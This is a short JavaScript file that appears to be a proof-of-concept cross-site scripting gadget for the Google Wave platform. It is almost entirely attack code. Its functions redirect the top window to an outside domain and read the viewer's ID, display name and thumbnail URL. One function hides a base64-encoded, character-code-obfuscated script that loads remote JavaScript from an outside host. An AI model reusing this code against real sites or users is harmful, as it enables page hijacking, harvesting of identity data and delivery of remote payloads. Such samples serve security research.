function actionPwn() { alert("onAction attack"); } function actionPwn2() { alert("onAction attack 2: Location manipulation"); window.top.location = "http://www.e-x-e.dk"; } function actionPwn3() { alert("onAction attack 3: Viewer informations"); alert("Viewer ID: " + wave.getViewer().getId()); alert("Viewer displayname: " + wave.getViewer().getDisplayName()); alert("Viewer thumbnail url: " + wave.getViewer().getThumbnailUrl()); } function actionPwn4() { alert("onAction attack 4: Location manipulation, local content"); window.top.location = "data:text/html;base64,PHNjcmlwdD5kb2N1bWVudC53cml0ZShTdHJpbmcuZnJvbUNoYXJDb2RlKDYwLDExNSw5OSwxMTQs MTA1LDExMiwxMTYsMzIsMTE1LDExNCw5OSw2MSwzNCwxMDQsMTE2LDExNiwxMTIsNTgsNDcsNDcs MTA1LDExMCwxMTYsMTAxLDExNCwxMTAsNDgsMTE2LDQ2LDExMCwxMDEsMTE2LDQ3LDExMiwxMTEs OTksNDYsMTA2LDExNSwzNCw2Miw2MCw0NywxMTUsOTksMTE0LDEwNSwxMTIsMTE2LDYyKSk8L3NjcmlwdD4="; } function init() { alert("Start of the XSS attack, loaded gadget load"); } gadgets.util.registerOnLoadHandler(init); onAction attacks
]]>